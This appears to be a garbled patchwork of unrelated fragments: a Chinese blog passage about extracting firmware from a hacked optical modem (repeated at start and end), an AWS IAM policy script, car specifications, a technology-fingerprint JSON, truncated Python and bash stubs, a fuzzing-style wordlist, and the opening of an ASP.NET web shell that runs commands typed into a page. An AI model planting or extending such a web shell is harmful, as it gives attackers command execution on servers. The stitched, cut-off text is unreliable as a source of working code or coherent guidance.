破解完光猫不过隐,继续琢磨,查了些智能设备安全的教程,分析智能设备或嵌入式设备安全,第一步是要提取固件,所以接下来要提取固件了。
通过/proc
虚拟文件系统读取MTD
分区表:
/ # cat /proc/mtd
dev: size erasesize name
mtd0: 08000000 00020000 "whole flash"
mtd1: 00200000 00020000 "u-boot"
#!/bin/bash | |
# put policy.json to location secretsManager/policy.json | |
# Create inline policy directly on the role | |
aws iam put-role-policy \ | |
--role-name $ROLE_NAME \ | |
--policy-name SecretsManagerAccess \ | |
--policy-document file://secretsManager/policy.json | |
# Extract values from your JSON file |
发动机型号: 2.4升DOHC非涡轮增压发动机 | |
总长:4,265毫米(167.9英寸)ET 除外,4,280毫米(168.5英寸)适用于 ET | |
总宽:1,775毫米(69.9英寸) | |
整体高度(在C.W.):1,310毫米(51.6英寸) | |
轴距:2,575毫米(101.4英寸) | |
前轮距:1,520毫米(59.8英寸) | |
后轮距:1,550毫米(61.0英寸) | |
最小路面间隙:130毫米(5.1英寸) | |
发动机气缸排列:横置、水冷、四缸四冲程汽油发动机 | |
发动机气门系统机构:链条驱动、双顶置凸轮轴、4气门/缸 |
{ | |
"technologies": { | |
"1C-Bitrix": { | |
"cats": [ | |
"1", | |
"6" | |
], | |
"category_names": null, | |
"cookies": { | |
"BITRIX_SM_GUEST_ID": "", |
#!/usr/bin/env python3 | |
import sys | |
import signal | |
from threading import Thread | |
from http.server import HTTPServer, BaseHTTPRequestHandler | |
#!/usr/bin/env python3 | |
import sys | |
if not sys.stdin.isatty(): | |
stdin = sys.stdin.read().splitlines() | |
gnmap = stdin | |
elif len(sys.argv) > 1: | |
target = sys.argv[1] | |
with open(GNMAP) as f: |
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
<%@ Page Language="VB" Debug="true" %> | |
<%@ import Namespace="system.IO" %> | |
<%@ import Namespace="System.Diagnostics" %> | |
<script runat="server"> | |
Sub RunCmd(Src As Object, E As EventArgs) | |
Dim myProcess As New Process() | |
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text) | |
myProcessStartInfo.UseShellExecute = false |
#!/bin/bash | |
NOCOLOR='\033[0m' | |
RED='\033[0;31m' | |
GREEN='\033[0;32m' | |
ORANGE='\033[0;33m' | |
BLUE='\033[0;34m' | |
PURPLE='\033[0;35m' | |
CYAN='\033[0;36m' | |
LIGHTGRAY='\033[0;37m' |
#!/usr/bin/python3 | |
from cmd import Cmd | |
import requests | |
import readline | |
import sys | |
from base64 import b64encode | |
from random import randrange | |
import threading | |
from time import sleep |
破解完光猫不过隐,继续琢磨,查了些智能设备安全的教程,分析智能设备或嵌入式设备安全,第一步是要提取固件,所以接下来要提取固件了。
通过/proc
虚拟文件系统读取MTD
分区表:
/ # cat /proc/mtd
dev: size erasesize name
mtd0: 08000000 00020000 "whole flash"
mtd1: 00200000 00020000 "u-boot"